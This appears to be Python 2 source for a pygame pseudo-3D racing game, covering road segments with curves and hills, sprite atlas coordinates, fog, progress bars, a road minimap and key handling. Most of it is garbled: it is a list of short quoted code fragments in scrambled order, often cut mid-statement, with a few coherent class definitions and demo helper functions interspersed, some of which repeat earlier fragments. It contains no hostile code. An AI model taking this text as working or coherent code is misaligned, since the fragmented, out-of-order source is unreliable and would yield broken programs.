xs4, ys4, xs3,", "= 0.0 self.zc = 0.0 ## self.xp = 0.0 self.yp", "def util_ease_out(self, a, b, percent): return a + (b -", "# <2> seg_n = len(self.segments) segbi = self.get_seg_base_i() #print 'segbi',", "seg_scale = self.geo_prjc_scale(self.d, zc1) x_rnd = random.randint(1, self.road_w / 2", "self.d, zc2) xsr3 = self.xp_to_xs(xpr3, self.w) xpr4 = self.xc_to_xp(xcr4, self.d,", "'w': 298, 'h': 190 }, 'BOULDER2': { 'x': 621, 'y':", "return p_curve = self.player_seg.get('curve', 0.0) #p_curve = 3 #print 'p_curve',", "self.xp_to_xs(xpl4, self.w) self.render_polygon(None, xs1, ys1, xsl1, ys1, xsl3, ys3, xs3,", "- percent, 2)) def util_ease_in_out(self, a, b, percent): return a", "xcr1 = self.lane_w - self.player_x xcr2 = -self.lane_w - self.player_x", "#theta_i = math.pi /180.0 * 0.5 theta_i = math.pi /180.0", "consts from starfish import sptdraw from starfish import utils IMG_POS_BACKGROUND", "from down to up self.pygm.draw.rect(self.surf, self.c_prog, [1, self.size[1] - y,", "/ 2) < sprt_x < (car_x + car_w / 2):", "e_keys_dn: self.player_di = 1 elif 3 in e_keys_dn: self.player_di =", "xsl1, xsl2] #x_sprt = xsr1 x_sprt = (xsr1 + xsl1)", "+ dx_curve dx_curve = dx_curve + seg.get('curve', 0.0) # for", "def refresh(self, fps_clock, *args, **kwargs): self.rdpsd.lbl_set(str(int(self.road.speed))) self.scr.lbl_set(str(int(self.road.score))) self.tm_once.lbl_set(str(int(self.road.tm_last_once))) prg =", "in ['sprites']: seg_c[k] = v else: seg_c[k] = [] for", "/ 2 + sprt_w / 2 #if (car_x + car_w", "a, b, percent): return a + (b - a) *", "[x1, y1-d]] #pnts = [[x1, y1+a], [x2, y2+a], [x3, y3+a],", "seg_n #print si 
seg = self.segments[si] #x#zw1 = (i+1)*self.seg_len #zw2", "{'imgs': ['img_sprts/i_chest1.png'], 'score': 100,}, 'coin1': {'imgs': ['img_sprts/i_coin1.png'], 'score': 1,}, 'coin5':", "pass else: try: obj.scale(scale) except: #print 'scale <2>', scale pass", "(ys1 + ys3) / 2.0 x_dt = x_rnd * seg_scale", "in enumerate(sprts): sprt = info['name'] obj_k = str(seg['index']) + '_'", "def rd_get_segs(self, whole=False): if whole: segs = self.segments else: segs", "xs2, ys2, xsl2, ys2, xsl4, ys4, xs4, ys4, seg['color']['rumble']) xpr1", "'HARD': 6 }, 'HILL': {'NONE': 0, 'LOW': 20, 'MEDIUM': 40,", "self.w) xp4 = self.xc_to_xp(xc4, self.d, zc2) xs4 = self.xp_to_xs(xp4, self.w)", "= -40 elif x_i == 2: sprt_at = 580 elif", "= c_bg self.c_prog = c_prog self.progress(0.0) def progress(self, prog): y", "self.lane_w xcl2 = xc2 + self.lane_w xcl3 = xc3 -", "0.0, 0.0) def rd_seg_init_rand_curve(self, n=5): #print 'rd_seg_init_rand', n for i", "prms_reset(self, keep_segs=False): self.e_keys_up = [] self.e_keys_dn = [] self.camera_x =", "xc4 + self.lane_w xcr1 = self.lane_w - self.player_x xcr2 =", "if self.position > self.track_len: self.position -= self.track_len #''' self.draw_on() self.rd_seg_render()", "#segnrand = random.randint(3, 30) segnrand = random.randint(2, 6) # for", "0 if 2 in e_keys_up: if self.player_go != 1: self.player_go", "def util_ease_in(self, a, b, percent): return a + (b -", "['obj']: spr_n[sk] = sv else: spr_n[sk] = None seg_c[k].append(spr_n) segs_c.append(seg_c)", "60.0#30.0#20.0 self.last_seg_i = 0 self.score = 0 self.game_over = False", "pnts return pnts def draw_segs(self, segs, rad): pnts = self.get_segs_pnts(segs,", "if self.player_di != 3: self.player_di = 0 if 3 in", "1:> 2:v 3:< self.player_go = 0 # 0:- 1:^ 2:v", "['img_sprts/ashra_defeat1.png'], 'score': -100,}, #'bear': {'imgs': ['img_sprts/bear2.png'], 'score': -80,}, #'dinof': {'imgs':", "3 else: return None def key_to_di_b(self, k): if k ==", "== 0.0: if cv_s: tht_d = self.cv_to_engl(cv_l, rad) #tht +=", "FP_ROAD_SPRTS = { 'chest': {'imgs': ['img_sprts/i_chest1.png'], 'score': 100,}, 'coin1': {'imgs':", "self.disp_add(self.lb1) ''' def handle_event(self, events, *args, **kwargs): return events def", "'w': 80, 'h': 45 }, 'PLAYER_LEFT': { 'x': 995, 'y':", "= 0 self.straight.rect.left = 0 self.disp_add(self.straight) '''' self.sn1 = SptTmpx((200,", "segnrand = random.randint(2, 6) # for a3c train self.rd_seg_init_rand(segnrand) #", "#self.score -= 1 #if self.score < 0: # self.score =", "random.random() * 6.0 yw = 0.0 self.add_road(enter, hold, leave, curve,", "fi: s = fi.read() segs = utils.json_loads(s) return segs def", "1 in e_keys_dn: self.player_di = 1 elif 3 in e_keys_dn:", "FP_COLOR_WHITE, 'grass': FP_COLOR_WHITE, 'rumble': FP_COLOR_WHITE}, 'FINISH': {'road': FP_COLOR_BLACK, 'grass': FP_COLOR_BLACK,", "= seg['p2']['world'].get('y', 0.0) yc1 = yc - yw1 yc2 =", "0.0 self.zw = 0.0 self.xc = 0.0 self.yc = 0.0", "y4, color): #d = 200#100#240#50# #a = 60 #pnts =", "test #o = SptTmpx((40, 40)) #return o class FPSptRoadB(sptdraw.SptDrawBase): def", "e_keys_dn: self.player_go = 1 elif 2 in e_keys_dn: self.player_go =", "ys3 print '-' * 30 ''' # grass self.render_polygon(None, 0,", "self.position = 0.0 self.player_x = 0.0#100.0#1000.0# self.centrifugal = 0.1#0.06#0.08#0.01#0.3 self.player_seg", "__file__) self.road.rd_reset(init=False, keep_segs=False, segs_file=segs_file) self.rdmap_reset() def road_segs_to_file(self, segs_file=None): if not", "* math.cos(engi * (i + 1)) xc1 = (rad -", "0.0: #yp = float('inf') #yp = 2 ** 64 
yp", "def __init__(self, img_file, pos, *args, **kwargs): super(FPSptBg, self).__init__(img_file, pos) class", "ys1, xsr2, ys2, xsr4, ys4, xsr3, ys3, seg['color']['rumble']) def rd_seg_render(self):", "return 1 elif k == self.pglc.K_DOWN: return 2 elif k", "1 #if self.score < 0: # self.score = 0 self.game_over", "'y': 375, 'w': 300, 'h': 170 }, 'BILLBOARD06': { 'x':", "2.0#4.0#6.0 self.speed_dt_na = 1.0#3.0 self.player_x_dt = 60.0#30.0#20.0 self.last_seg_i = 0", "elif k == self.pglc.K_SPACE or k == self.pglc.K_v or k", "190 }, 'BILLBOARD05': { 'x': 5, 'y': 897, 'w': 298,", "get_seg_base_i(self, pos=None): if pos is None: pos = self.position i", "= x_curve + dx_curve dx_curve = dx_curve + seg.get('curve', 0.0)", "in range(n): rct = [0, i * d, self.size[0], d]", "pygm.SptLbl('hello,', c=consts.GREEN, font_size=32) self.lb1.rect.top = 200 self.lb1.rect.left = 100 self.disp_add(self.lb1)", "= 312 self.disp_add(self.rdpsd) self.scr = pygm.SptLbl(str(int(self.road.score)), c=consts.RED, font_size=16) self.scr.rect.top =", "rad #self.fill(consts.WHITE) self.draw_segs(self.segs, self.rad) def xy_to_cntr(self, x, y): return [self.size[0]", "self.add_road(num, num, num, 0, height) self.add_road(num, num, num, 0, 0)", "len(self.segments) segbi = self.get_seg_base_i() print 'segbi', segbi # TODO: do", "80, 'h': 56 }, 'PLAYER_UPHILL_LEFT': { 'x': 1383, 'y': 961,", "FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['EASY'])", "self.size[1] / 2), self.size[0] / 2, 0) class SptTmpi(pygm.SptImg): def", "0.0 #xc1 = self.road_w / 2 - self.player_x #xc2 =", "- sky.rect.width > 0: sky.rect.left -= sky.rect.width * 2 for", "k == self.pglc.K_SPACE: # hide / show road map self.rdmap_hide()", "#''' if self.player_di == 3: # < self.player_x -= 9", "'CURVE': {'NONE': 0, 'EASY': 2, 'MEDIUM': 4, 'HARD': 6 },", "{ 'x': 5, 'y': 897, 'w': 298, 'h': 190 },", "forward forever. 
class SptTmpx(sptdraw.SptDrawBase):
    """A placeholder sprite: a white circle on green, used for tests."""

    def draw_on(self, *args, **kwargs):
        self.fill(consts.GREEN)
        self.pygm.draw.circle(self.surf, consts.WHITE,
                              (self.size[0] / 2, self.size[1] / 2),
                              self.size[0] / 2, 0)


class SptTmpi(pygm.SptImg):
    def __init__(self, img_file, *args, **kwargs):
        super(SptTmpi, self).__init__(img_file)


class FPSptBg(pygm.SptImgOne):
    def __init__(self, img_file, pos, *args, **kwargs):
        super(FPSptBg, self).__init__(img_file, pos)


class FPSptSprts(pygm.SptImgOne):
    def __init__(self, img_file, pos, *args, **kwargs):
        super(FPSptSprts, self).__init__(img_file, pos)


class FPSptFog(sptdraw.SptDrawBase):
    """A horizontal fog band drawn as thin rows of fading alpha."""

    def __init__(self, size, c=None, h=30, *args, **kwargs):
        super(FPSptFog, self).__init__(size)
        if c is None:
            # FP_COLORS['FOG'] as an RGBA list; the original default is
            # garbled in the source
            c = [0, 81, 8, 0]
        self.c = c
        self.h = h
        self.draw_on()

    def draw_on(self, *args, **kwargs):
        #self.fill(self.c)
        d = 2
        n = self.h / d
        for i in range(n):
            rct = [0, i * d, self.size[0], d]
            # alpha fades out towards the bottom row; the exact ramp is
            # garbled in the source, a linear one is assumed here
            ca = 255 / n * (n - i)
            self.c[3] = ca
            self.pygm.draw.rect(self.surf, self.c, rct)


class FPSptProgress(sptdraw.SptDrawBase):
    """A thin vertical progress bar."""

    def __init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN):
        super(FPSptProgress, self).__init__(size)
        self.c_bg = c_bg
        self.c_prog = c_prog
        self.progress(0.0)

    def progress(self, prog):
        y = self.size[1] * prog
        self.fill(self.c_bg)
        # fill the bar from down to up
        self.pygm.draw.rect(self.surf, self.c_prog,
                            [1, self.size[1] - y, self.size[0] - 2, y])


class FPSptRdSprts(pygm.SptImg):
    def __init__(self, img_file, *args, **kwargs):
        super(FPSptRdSprts, self).__init__(img_file)

    @classmethod
    def create_by_img(cls, img):
        return cls(img)
        # for test
        #o = SptTmpx((40, 40))
        #return o
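
# How FPSptRoadB.add_road() (below) shapes a road: each call lays down 'enter'
# segments easing the curve in, 'hold' segments at full curve, and 'leave'
# segments easing it back out. The free functions here mirror the class's
# util_ease_in / util_ease_out so the per-segment curve profile can be checked
# without a game window; they are an illustrative sketch, never called by the
# game itself.

def _demo_ease_in(a, b, percent):
    # quadratic ease-in, same form as FPSptRoadB.util_ease_in
    return a + (b - a) * math.pow(percent, 2)


def _demo_ease_out(a, b, percent):
    # quadratic ease-out, same form as FPSptRoadB.util_ease_out
    return a + (b - a) * (1 - math.pow(1 - percent, 2))


def _demo_road_curve_profile(enter=4, hold=4, leave=4, curve=6.0):
    # per-segment curve values for one enter/hold/leave block:
    # [0.0, 0.375, 1.5, 3.375, 6.0, 6.0, 6.0, 6.0, 6.0, 3.375, 1.5, 0.375]
    vals = []
    for n in range(enter):
        vals.append(_demo_ease_in(0, curve, float(n) / enter))
    for n in range(hold):
        vals.append(curve)
    for n in range(leave):
        vals.append(_demo_ease_out(curve, 0, float(n) / leave))
    return vals
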
"self.clr_dark_grass = utils.clr_from_str(FP_COLORS['DARK']['grass']) self.rd_reset(init=True) self.add_fog() def prms_reset(self, keep_segs=False): self.e_keys_up =", "- self.position #zc1 = self.position - (zw1 - self.camera_z) #zc2", "'x': 1385, 'y': 1018, 'w': 80, 'h': 45 }, 'PLAYER_LEFT':", "self.player_x = 0.0#100.0#1000.0# self.centrifugal = 0.1#0.06#0.08#0.01#0.3 self.player_seg = None self.base_seg", "= seg['p2']['world']['z'] ''' zw1 = (i+1)*self.seg_len zw2 = (i+2)*self.seg_len zc1", "add after road #self.road = FPSptRoad((640, 240), self.cfg) self.road =", "util_limit(self, value, mn, mx): return max(mn, min(value, mx)) def util_accelerate(self,", "+ i) % seg_n #print si seg = self.segments[si] #'''", "FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['MEDIUM'])", "**kwargs) self.straight = FPStraight({}) self.straight.rect.top = 0 self.straight.rect.left = 0", "sprt_w / 2 #if (car_x + car_w / 2) <", "= 0 self.disp_add(self.bg_trees1) self.bg_trees2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees2.rect.top = 0", "FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], 0.0)", "> 500: #print 'scale <1>', scale pass else: try: obj.scale(scale)", "> self.seg_len * 2: if self.tm_start == 0.0: self.tm_start =", "self.size[1] if not keep_segs: self.segments = [] self.rd_sprt_objs = {}", "'grass': '#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'}, } FP_ROAD = {", "whole: segs = self.segments else: segs = self.segments[:-self.seg_draw_n] return segs", "5, 'y': 495, 'w': 1280, 'h': 480 }, 'TREES': {", "#i = int(math.ceil(pos / self.seg_len)) seg_n = len(self.segments) i =", "* TAB : replay this road * RETURN : go", "1) dx1 = self.seg_len * math.tan(theta1) dx2 = self.seg_len *", "'p_curve', p_curve p_dt = self.speed * p_curve * self.centrifugal #print", "/ self.road.track_len self.prog.progress(prg) spdc = self.road.speed / self.road.speed_max self.spd.progress(spdc) class", "['img_sprts/i_coin1.png'], 'score': 1,}, 'coin5': {'imgs': ['img_sprts/i_coin5.png'], 'score': 5,}, 'coin20': {'imgs':", "-80,}, #'dinof': {'imgs': ['img_sprts/dinof2.png'], 'score': -50,}, 'blobb': {'imgs': ['img_sprts/blobb1.png'], 'score':", "self.key_to_di_b(event.key) if di is not None: e_keys_up.append(di) else: r_events.append(event) elif", "xsl1) / 2.0, (xsr2 + xsl2) / 2.0, xsl1, xsl2]", "r_events = [] for event in events: #print event if", "1.0: a = 1.0 #tht_d = math.acos(a) tht_d = math.asin(a)", "'#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'}, 'DARK': {'road': '#696969', 'grass': '#009A00',", "self.disp_add(self.bg_trees1) self.bg_trees2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees2.rect.top = 0 self.bg_trees2.rect.left =", "= pygm.SptLbl('hello,', c=consts.GREEN, font_size=32) self.lb1.rect.top = 200 self.lb1.rect.left = 100", "/180.0 * 0.5 theta_i = math.pi /180.0 * 0.9 #theta_i", "r_events.append(event) elif event.type == self.pglc.KEYDOWN: r_events.append(event) else: r_events.append(event) return r_events", "float('inf') #yp = 2 ** 64 
yp = yc else:", "= self.xp_to_xs(xpl1, self.w) xpl2 = self.xc_to_xp(xcl2, self.d, zc1) xsl2 =", "5: sprt_at = -1100 #print 'sprt_x', sprt_x #print 'car_x', car_x", "car_x = self.player_x car_w = self.car.rect.width * 2 sprt_at =", "= x_i # x_i_saved = x_i obj.rect.top = 116 -", "= yc - yw2 #print yw1, yw2 xp1 = self.xc_to_xp(xc1,", "dt) def util_increase(self, start, increment, mx): # with looping result", "math.pi /180.0 * 0.5 theta_i = math.pi /180.0 * 0.9", "return (n % total) / total def add_road(self, enter, hold,", "0 self.straight.rect.left = 0 self.disp_add(self.straight) '''' self.sn1 = SptTmpx((200, 200))", "segs, rad): pnts = [] x, y = 0.0, 0.0", "}, 'TRUCK': { 'x': 1365, 'y': 644, 'w': 100, 'h':", "= self.road_w / 2 - self.player_x - curve_d * i", "= float('inf') #xp = 2 ** 64 xp = xc", "0.0) def rd_seg_add(self, curve=0.0, yw=0.0): #print '+', curve, yw n", "ys4, 0, ys3, seg['color']['grass']) self.render_polygon(None, xs1, ys1, xs2, ys2, xs4,", "if zc == 0.0: return 1.0 else: return d /", "(i+1)*self.seg_len zw2 = (i+2)*self.seg_len zc1 = zw1 - self.camera_z -", "10.0#50.0# x += rad_m * math.cos(tht) y += rad_m *", "- self.position zc2 = zw2 - self.camera_z - self.position #zc1", "n is None: #n = seg_n / 20 n =", "'MEDIUM': 50, 'LONG': 100 }, # num segments 'CURVE': {'NONE':", "car_w #print 'sprt_at', (car_x - car_w / 2), sprt_at, (car_x", "40) leave = random.randint(10, 40) if p < 0.3: curve", "xcl2 = xc2 + self.lane_w xcl3 = xc3 - self.lane_w", "yc1 = yc - yw1 yc2 = yc - yw2", "# self.score = 0 self.game_over = True self.game_score = -1.0", "with open(f, 'w') as fo: fo.write(s) def rd_seg_json_load(self, f): with", "/ d for i in range(n): rct = [0, i", "curve else: cv_s = 1 continue x += rad_m *", "ys2 print xs4, ys4, xs3, ys3 print '-' * 30", "'#CCCCCC'}, 'DARK': {'road': '#696969', 'grass': '#009A00', 'rumble': '#BBBBBB' }, 'START':", "yp1 = self.yc_to_yp(yc, self.d, zc1) ys1 = self.yp_to_ys(yp1, self.h) ys2", "= 200 self.lb1.rect.left = 100 self.disp_add(self.lb1) ''' def handle_event(self, events,", "644, 'w': 100, 'h': 78 }, 'CAR03': { 'x': 1383,", "add_curves(self): self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'],", "#sprts = self.player_seg['sprites'] sprts = self.base_seg['sprites'] if not sprts: return", "zc2) xs3 = self.xp_to_xs(xp3, self.w) xp4 = self.xc_to_xp(xc4, self.d, zc2)", "''' #x# if seg['index'] < segbi: zw1 = (i+1)*self.seg_len zw2", "ys1, xs2, ys2, xs4, ys4, xs3, ys3, seg['color']['road']) def rd_seg_render__3_o(self):", "== self.pglc.K_DOWN: return 2 elif k == self.pglc.K_LEFT: return 3", "if di is not None: e_keys_up.append(di) else: r_events.append(event) elif event.type", "= [[x1, y1-d], [x2, y2-d], [x3, y3-d], [x4, y4-d], [x1,", "10) if self.position > self.track_len: self.position -= self.track_len #''' self.draw_on()", "self.c[3] = ca self.pygm.draw.rect(self.surf, self.c, rct) class FPSptRdSprts(pygm.SptImg): def __init__(self,", "self.draw_on() def draw_on(self, *args, **kwargs): #self.fill(self.c) d = 2 n", "'score': 70,}, 'clown': {'imgs': ['img_sprts/clown1.png'], 'score': -100,}, } class SptTmpx(sptdraw.SptDrawBase):", "xp, w): #xs = w / 2.0 + w /", "j = random.randint(10, seg_n - 10) sprt = random.choice(FP_ROAD_SPRTS.keys()) s", "#yp = float('inf') #yp = 2 ** 64 yp =", "2.0 / self.seg_draw_n 
engi = math.pi / 2.0 / 60#10#20", "not None: try: segs = self.rd_seg_json_load(segs_file) self.segments = segs self.track_len", "road map self.rdmap_hide() elif k == self.pglc.K_RETURN: self.road_reset() elif k", "len(self.segments) segbi = self.get_seg_base_i() #print 'segbi', segbi, ' / ',", "'w': 282, 'h': 295 }, 'BILLBOARD04': { 'x': 1205, 'y':", "self.player_x - curve_d * i xp1 = self.xc_to_xp(xc1, self.d, zc1)", "yw = random.random() * 10.0 else: curve = rl *", "- self.player_x xc4 = -self.road_w / 2 - self.player_x #xcl1", "zw2 - self.camera_z - self.position ''' # for curve xc1", "w): #xs = w / 2.0 + w / 2.0", "self.rdpsd.lbl_set(str(int(self.road.speed))) self.scr.lbl_set(str(int(self.road.score))) self.tm_once.lbl_set(str(int(self.road.tm_last_once))) prg = self.road.position / self.road.track_len self.prog.progress(prg) spdc", "FP_COLOR_BLACK}, 'START_Y': {'road': FP_COLOR_YELLOW, 'grass': '#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'},", "info.get('obj') ''' # TODO: <1> if not obj: obj =", "'world y', seg['p1']['world'].get('y', 0.0) #print '-' * 30 ''' '''", "(d / zc) return yp def xp_to_xs(self, xp, w): #xs", "= 2.0#4.0#6.0 self.speed_dt_na = 1.0#3.0 self.player_x_dt = 60.0#30.0#20.0 self.last_seg_i =", "rd_seg_init_rand_2(self, n=50): for i in range(n): p = random.random() #print", "2 y_sprt = ys1 scale_sprt = seg_scale * 8.0#10.0#2.0 obj", "#print k, sprt self.disp_del(sprt) del self.rd_sprt_objs[k] def util_limit(self, value, mn,", "obj: self.disp_del(obj) # NOTE: objs will be deleted at rd_sprts_del_all_objs()", "#zw2 = (i+2)*self.seg_len #''' # <1> zw1 = seg['p1']['world']['z'] zw2", "- curve_d * i xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1", "self.segments[j]['sprites'].append(s) def rd_sprts_del_all_objs(self): for k, sprt in self.rd_sprt_objs.items(): #print k,", "k == self.pglc.K_k: return 1 elif k == self.pglc.K_SPACE or", "FP_ROAD['CURVE']['EASY']) else: enter = random.randint(10, 100) hold = random.randint(10, 100)", "'world z', self.player_seg['p1']['world']['z'] #print 'world y', self.player_seg['p1']['world'].get('y', 0.0) # clear", "+ hill.rect.width < 0: hill.rect.left += hill.rect.width * 2 if", "#self.pygm.draw.polygon(self.surf, c, cpnts) self.pygm.draw.lines(self.surf, c, False, cpnts, 3) class FPSptProgress(sptdraw.SptDrawBase):", "score when go out the road if self.player_x < -self.road_w", "utils IMG_POS_BACKGROUND = { 'HILLS': { 'x': 5, 'y': 5,", "= '#00EEEE' FP_COLORS = { 'SKY': '#72D7EE', 'TREE': '#005108', 'FOG':", "math.cos(tht) y += rad_m * math.sin(tht) pnts.append([x, y]) #print pnts", "dx_curve x_curve = x_curve + dx_curve dx_curve = dx_curve +", "self.seg_len)) seg_n = len(self.segments) i = (i + seg_n) %", "= [[x1, y1], [x2, y2], [x3, y3], [x4, y4], [x1,", "0.0) #p_curve = 3 #print 'p_curve', p_curve p_dt = self.speed", "220 }, 'BILLBOARD02': { 'x': 245, 'y': 1262, 'w': 215,", "y2+a], [x3, y3+a], [x4, y4+a], [x1, y1+a]] # reflect the", "'chest': {'imgs': ['img_sprts/i_chest1.png'], 'score': 100,}, 'coin1': {'imgs': ['img_sprts/i_coin1.png'], 'score': 1,},", "= utils.dir_abs(segs_file, __file__) self.road.rd_reset(init=False, keep_segs=False, segs_file=segs_file) self.rdmap_reset() def road_segs_to_file(self, segs_file=None):", "in range(a): self.rd_seg_add(0.0, 0.0) def rd_seg_add(self, curve=0.0, yw=0.0): #print '+',", "if self.player_x < -1000: self.player_di = 1 elif self.player_di ==", "h=30, *args, **kwargs): super(FPSptFog, self).__init__(size) self.c = c self.h =", "in e_keys_dn: self.player_di = 3 if 0 in e_keys_up: if", "- 2, y]) 
class FPStraight(pygm.PyGMSprite): def __init__(self, cfg, *args, **kwargs):", "= xc1 - self.lane_w #xcl2 = xc2 + self.lane_w #xcl3", "seg['color']['road']) def rd_seg_render__4_o(self): \"\"\"curve\"\"\" #theta_i = math.pi /180.0 * 0.1", "== self.pglc.K_j: return 0 elif k == self.pglc.K_k: return 1", "/180.0 * 0.1 #theta_i = math.pi /180.0 * 0.5 theta_i", "or ROAD['LENGTH']['SHORT'] height = height or ROAD['HILL']['LOW'] self.add_road(num, num, num,", "= -self.road_w / 2 - self.player_x xcl1 = xc1 -", "= kwargs.get('bg_hills') self.bg_trees = kwargs.get('bg_trees') self.clr_dark_road = utils.clr_from_str(FP_COLORS['DARK']['road']) self.clr_dark_grass =", "1 elif k == self.pglc.K_DOWN: return 2 elif k ==", "0: return 0.0 else: return self.segments[seg_n - 1]['p2']['world'].get('y', 0.0) def", "self.player_x - curve_d * i #xc2 = -self.road_w / 2", "}, 'BOULDER1': { 'x': 1205, 'y': 760, 'w': 168, 'h':", "return 2 elif k == self.pglc.K_d: return 3 else: return", "self).__init__(title, winw, winh) bk_im = utils.dir_abs('starfish/data/img_bk_1.jpg', __file__) #self.bk = pygm.SptImg('data/img_bk_1.jpg')", "update_bg(self): # always move the cloud for sky in self.bg_sky:", "self.straight.rect.left = 0 self.disp_add(self.straight) '''' self.sn1 = SptTmpx((200, 200)) self.sn1.rect.top", "> 0: # pnts.append(pnts[0]) cpnts = [self.xy_to_cntr(p[0], p[1]) for p", "(b - a) * math.pow(percent, 2) def util_ease_out(self, a, b,", "hill.rect.width * 2 if hill.rect.left - hill.rect.width > 0: hill.rect.left", "= 70#340 self.prog.rect.left = 610 #self.prog.rotate(180) self.disp_add(self.prog) self.spd = FPSptProgress((4,", "elif event.type == self.pglc.KEYDOWN: di = self.key_to_di(event.key) if di is", "self.add_road(num, num, num, 0, height/2.0) self.add_road(num, num, num, 0, 0)", "self.road_w / 2 - self.player_x #xc4 = -self.road_w / 2", "self.track_len: self.position -= self.track_len #''' self.draw_on() self.rd_seg_render() def refresh(self, fps_clock,", "1280, 'h': 480 }, 'SKY': { 'x': 5, 'y': 495,", "2 for trees in self.bg_trees: trees.rect.left += int(self.tree_speed * p_dt)", "1: xpl1 = self.xc_to_xp(xcl1, self.d, zc1) xsl1 = self.xp_to_xs(xpl1, self.w)", "hill in self.bg_hills: hill.rect.left += int(self.hill_speed * p_dt) if hill.rect.left", "cv_l += curve else: cv_s = 1 continue x +=", "'score': -100,}, #'bear': {'imgs': ['img_sprts/bear2.png'], 'score': -80,}, #'dinof': {'imgs': ['img_sprts/dinof2.png'],", "xcr3 - x_curve - dx_curve xcr4 = xcr4 - x_curve", "ys2, xsl4, ys4, xs4, ys4, seg['color']['rumble']) xpr1 = self.xc_to_xp(xcr1, self.d,", "= (i+1)*self.seg_len zw2 = (i+2)*self.seg_len else: # <1> zw1 =", "= pygm.SptImg(bk_im) self.bk.rect.top = -230 self.bk.rect.left = -230 #self.disp_add(self.bk) self.scn1", "= random.randint(10, 40) if p < 0.3: curve = 0.0", "- self.player_x #xc4 = -self.road_w / 2 - self.player_x #", "+ trees.rect.width < 0: trees.rect.left += trees.rect.width * 2 if", "info.get('x_i') #if not x_i_saved: # info['x_i'] = x_i # x_i_saved", "# clear the sprites cache self.rd_sprt_cache = [] # <1>", "self.e_keys_up) self.draw_on() self.rd_seg_render() self.update_world() self.check_if_car_out_road() self.check_score() self.check_tm() self.update_bg() def check_player_di(self,", "self.seg_len def seg_lasy_y(self): seg_n = len(self.segments) if seg_n == 0:", "'y': 555, 'w': 135, 'h': 332 }, 'BILLBOARD09': { 'x':", "ys3 = self.yp_to_ys(yp3, self.h) ys4 = ys3 #''' #if 1:", "if road_file: self.scn1.straight.road_reset_from_file(segs_file=road_file) def main(): #sf = 
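
# The renderer above is a classic pseudo-3D projection: a road-space point
# (xc, yc) at camera depth zc is scaled by d / zc and shifted into screen
# space. A tiny self-contained check of that math, mirroring
# FPSptRoadB.xc_to_xp / xp_to_xs / yc_to_yp / yp_to_ys (illustrative only,
# never called by the game):

def _demo_project(xc, yc, d, zc, w, h):
    # perspective divide: far points (large zc) shrink toward screen center
    scale = 1.0 if zc == 0.0 else d / zc
    xs = w / 2.0 + xc * scale
    ys = h / 2.0 - yc * scale
    return xs, ys

# e.g. the right road edge (xc=1200) at depth zc=400 with d=200:
# _demo_project(1200, 500, 200.0, 400, 640, 240) == (920.0, -130.0);
# doubling zc halves the offset from the screen center.
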
class FPSptRoadMap(sptdraw.SptDrawBase):
    """A small top-down minimap of the whole track."""

    def __init__(self, size, segs, seg_len, *args, **kwargs):
        super(FPSptRoadMap, self).__init__(size)
        self.segs = segs
        self.seg_len = seg_len
        # radius used to turn per-segment curve values into angles;
        # the exact value is garbled in the source
        self.rad = 100.0
        self.draw_on()

    def draw_on(self, *args, **kwargs):
        #self.fill(consts.WHITE)
        self.draw_segs(self.segs, self.rad)

    def xy_to_cntr(self, x, y):
        return [self.size[0] / 2 + x, self.size[1] / 2 - y]

    def cv_to_engl(self, curve, rad):
        # convert an accumulated curve value into a turning angle
        a = float(curve) / rad
        a *= 10.0
        if a < -1.0:
            a = -1.0
        elif a > 1.0:
            a = 1.0
        #tht_d = math.acos(a)
        tht_d = math.asin(a)
        return tht_d

    def get_segs_pnts(self, segs, rad):
        pnts = []
        x, y = 0.0, 0.0
        tht = 0.0
        rad_m = 4.0
        cv_s = 0
        cv_l = 0.0
        pnts.append([x, y])
        for seg in segs:
            curve = seg.get('curve', 0.0)
            if curve == 0.0:
                if cv_s:
                    # a curved stretch just ended: turn by its total curve
                    tht_d = self.cv_to_engl(cv_l, rad)
                    tht += tht_d
                    rad_m = 20.0
                    cv_s = 0
                    cv_l = 0.0
                else:
                    rad_m = 0.5
            else:
                if cv_s:
                    cv_l += curve
                else:
                    cv_s = 1
                continue
            x += rad_m * math.cos(tht)
            y += rad_m * math.sin(tht)
            pnts.append([x, y])
        return pnts

    def draw_segs(self, segs, rad):
        pnts = self.get_segs_pnts(segs, rad)
        if len(pnts) <= 1:
            return
        #if len(pnts) > 0:
        #    pnts.append(pnts[0])
        cpnts = [self.xy_to_cntr(p[0], p[1]) for p in pnts]
        c = utils.clr_from_str(FP_COLOR_BLUE)
